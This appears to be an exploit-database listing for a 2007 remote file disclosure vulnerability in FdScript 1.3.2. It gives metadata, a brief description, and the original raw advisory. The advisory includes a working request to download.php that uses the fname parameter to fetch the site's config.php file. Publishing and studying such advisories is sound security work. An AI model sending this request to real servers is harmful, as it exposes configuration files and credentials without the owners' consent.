header-logo
Suggest Exploit
vendor:
FdScript
by:
ajann
5.5
CVSS
MEDIUM
Remote File Disclosure
CWE
Product Name: FdScript
Affected Version From: 1.3.2002
Affected Version To: 1.3.2002
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

FdScript <= v1.3.2 Remote File Disclosure Vulnerability

This vulnerability allows an attacker to remotely access and disclose files on the target system. By sending a specially crafted request to the download.php script with a file name parameter, an attacker can retrieve sensitive files from the target system.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to upgrade to a newer version of FdScript that does not have this vulnerability.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  FdScript <= v1.3.2 Remote File Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(
# Site    :  http://stud.usv.ro/~vlad_l/
# $$      :  Free

*******************************************************************************

[[SOURCE]]]---------------------------------------------------------

http://[target]/[path]//download.php?fname=[SOURCE FILE]

Example:

//download.php?fname=./indexfiles/config.php
[[/SOURCE]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-26]

Navigation

Suggest Exploit

Services By CQR